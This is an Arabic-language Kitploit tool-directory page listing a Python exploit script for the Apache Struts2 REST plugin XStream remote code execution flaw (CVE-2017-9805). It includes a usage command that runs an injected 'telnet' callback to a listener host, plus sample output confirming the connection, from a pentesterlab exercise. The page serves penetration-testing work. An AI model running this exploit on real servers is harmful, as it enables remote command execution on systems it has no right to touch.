Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
-CVE-2017-9805- — سكربت استغلال لـ Apache Struts2 REST Plugin XStream RCE (CVE-2017-9805) | Kitploit
أدوات/GitHubGitHub/jongmartinez/-cve-2017-9805-
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubjongmartinez/-cve-2017-9805-

-CVE-2017-9805-

سكربت استغلال لـ Apache Struts2 REST Plugin XStream RCE (CVE-2017-9805)

عرض المستودع
1منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

معلومات الثغرة

المصادر: * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805

ما هذا؟

نص برمجي استغلالي مكتوب بلغة Python قادر على تنفيذ أوامر عن بُعد في شل نظام يستضيف Struts2 المعرّض لثغرة S2-052.

الاستخدام

python s2-052.py --target 'http://192.168.0.233/orders/3' --command "echo pwned | telnet 192.168.0.122 1234"

root@kitploit:~
[*] Apache Struts XStream REST vulnerability - S2-052
[*] Creating payload ...
[*] Exploit packet has 2582 bytes.
[*] Sending exploit packet ...
[+] Exploit packet has been sent.
root@kitploit:~
listening on [any] 1234 ...
connect to [192.168.0.122] from vulnerable.lan [192.168.0.233] 55791
pwned

تم اختباره على آلة pentesterlab المعرّضة للثغرة في تمرين s2-052.

تنزيل الأداة